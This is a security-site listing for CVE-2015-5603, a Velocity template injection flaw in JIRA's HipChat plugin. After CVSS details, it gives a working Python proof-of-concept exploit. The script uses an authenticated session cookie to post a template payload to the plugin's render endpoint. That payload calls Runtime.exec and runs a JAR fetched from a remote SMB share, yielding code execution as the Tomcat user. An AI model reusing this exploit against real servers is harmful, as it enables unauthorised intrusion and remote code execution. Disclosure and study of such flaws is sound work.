JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability

2015.10.29
Credit: Chris Wood
Risk: Low
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################################ # JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability # Date: 2015-08-26 # CVE ID: CVE-2015-5603 # Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html # # Product: JIRA and the HipChat for JIRA plugin. # Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0 # Affected JIRA product versions: 6.3.5 <= version < 6.4.11 # # Discovered internally by Atlassian (vendor) # Proof of concept script by Chris Wood <chris@invivid.com> # # Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64 # Allows any authenticated JIRA user to execute code running as Tomcat identity ############################################################################ import urllib2 import json # cookie of any authenticated session (ex. jira-user) JSESSIONID = '541631B0D72EF1C71E932953F4760A70' # jira server RHOST = 'http://192.168.2.15:8080' # samba public share, read/write to anonymous users CMD = ' java -jar \\192.168.2.234\public\payload.jar ' data = { 'message': ' $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('' + CMD + '').waitFor() ' } opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID)) urllib2.install_opener(opener) req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/') req.add_header('Content-Type', 'application/json') response = urllib2.urlopen(req, json.dumps(data)) print('##################################') print('######### CVE-2015-5603 ##########') print('##################################') print(response.read())


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top